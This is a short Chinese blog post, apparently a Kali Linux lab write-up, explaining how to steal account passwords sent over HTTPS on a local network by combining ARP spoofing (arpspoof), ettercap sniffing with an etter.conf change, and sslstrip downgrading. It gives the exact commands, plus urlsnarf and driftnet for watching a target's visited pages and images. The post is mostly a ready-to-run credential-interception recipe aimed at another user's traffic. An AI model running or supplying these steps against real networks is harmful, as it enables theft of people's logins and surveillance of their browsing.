针对HTTPS协议获取账号密码

如果用arpspoof配合ettercap只能获得http协议下的相关账号密码。但是,现在普遍https协议,那么这种方法就GG了。


首先,由于默认的ettercap只能嗅探http协议下的密码,所以,若进行https协议下的嗅探,那么,就要对ettercap配置文件做一些修改。

路径:
/etc/ettercap/etter.conf

去掉注释,让命令生效就可以了。同时保存退出。

然后,用arpspoof配合ettercap以及sslstrip就可以获得https下的密码。

补充:sslstrip是一款可以将https还原成http的工具。

命令:

arpspoof -t 192.168.1.130 192.168.1.1 -i eth0        进行欺骗

ettercap -Tq -i eth0        进行嗅探

sslstrip -a -f -k

注意:并不是每次都能成功抓到用户名密码,同时,推荐给kali装一个usb外置网卡,否则,在做实验的时候总会遇到各种坑!这些坑是新手不容易跨过的!因为虚拟机毕竟只是虚拟机!同时,防火墙、杀毒软件是否也会影响实验效果?有待考量。

最后,补充一下kali中几个和本次实验相关的工具,以及使用方法:

urlsnarf -i eth0
在成功的ARP欺骗后,可以利用这个命令抓取流量,看目标浏览了哪些网页。

driftnet -i eth0
同理,在arp欺骗成功后,可以从网卡中抓取目标浏览的图片,但是只能是图片,而且还有一个缺陷,那就是不是所有的图片都能抓到。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容